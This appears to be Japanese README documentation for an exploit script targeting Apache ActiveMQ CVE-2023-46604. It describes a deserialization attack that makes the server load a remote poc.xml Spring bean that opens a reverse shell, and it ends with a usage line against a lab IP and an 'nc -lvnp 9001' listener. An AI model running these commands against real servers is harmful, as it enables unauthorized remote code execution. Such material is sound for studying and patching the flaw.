
このスクリプトは、Apache ActiveMQ (CVE-2023-46604) の安全でない逆シリアル化の脆弱性を悪用します。
攻撃の技術概要: CVE-2023-46604
このスクリプトは、Apache ActiveMQ の安全でない逆シリアル化の脆弱性 (CVE-2023-46604) を悪用して、対象サーバーでリモートコード実行を達成します。 悪用プロセスの説明
脆弱性の対象:
この脆弱性は Apache ActiveMQ の OpenWire プロトコルに存在します。
オブジェクトの安全でない逆シリアル化を許可するため、サーバー上で任意のコードを実行するために悪用される可能性があります。
前提条件:
ActiveMQ サーバーへのネットワークアクセス。
対象サーバーからアクセス可能な URL を通じて入手できる悪意のある XML ファイル (poc.xml)。
攻撃の構成要素:
Python スクリプト: 悪意のあるペイロードを ActiveMQ サーバーに送信する処理を自動化します。
XML ファイル (poc.xml): 悪意のあるコマンド (例: リバースシェルを開く) の実行を定義する Spring の Bean が含まれています。
攻撃の手順
ペイロードの準備:
スクリプトは、以下の内容を含む16進数のメッセージを構築します:
Java クラス名: org.springframework.context.support.ClassPathXmlApplicationContext.
悪意のある XML ファイルの URL.
ペイロードは、OpenWire プロトコルを介して送信できるバイト列に変換されます。
ペイロードの送信:
スクリプトは、指定されたポート (デフォルトは 61616) で ActiveMQ サーバーへの TCP ソケット接続を開きます。
悪意のあるペイロードをサーバーに送信します。
悪意のあるコードの実行:
ActiveMQ サーバーは、ペイロードに指定されたオブジェクトを逆シリアル化します。
安全でない逆シリアル化により、XML ファイルで定義された Spring の Bean がロードおよび実行されます。
この Bean は、サーバー上で悪意のあるコマンド (例: リバースシェル) を実行します。
_________________________________________________________
実行例:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
このスクリプトはスペイン語でコピー・修正されたものです: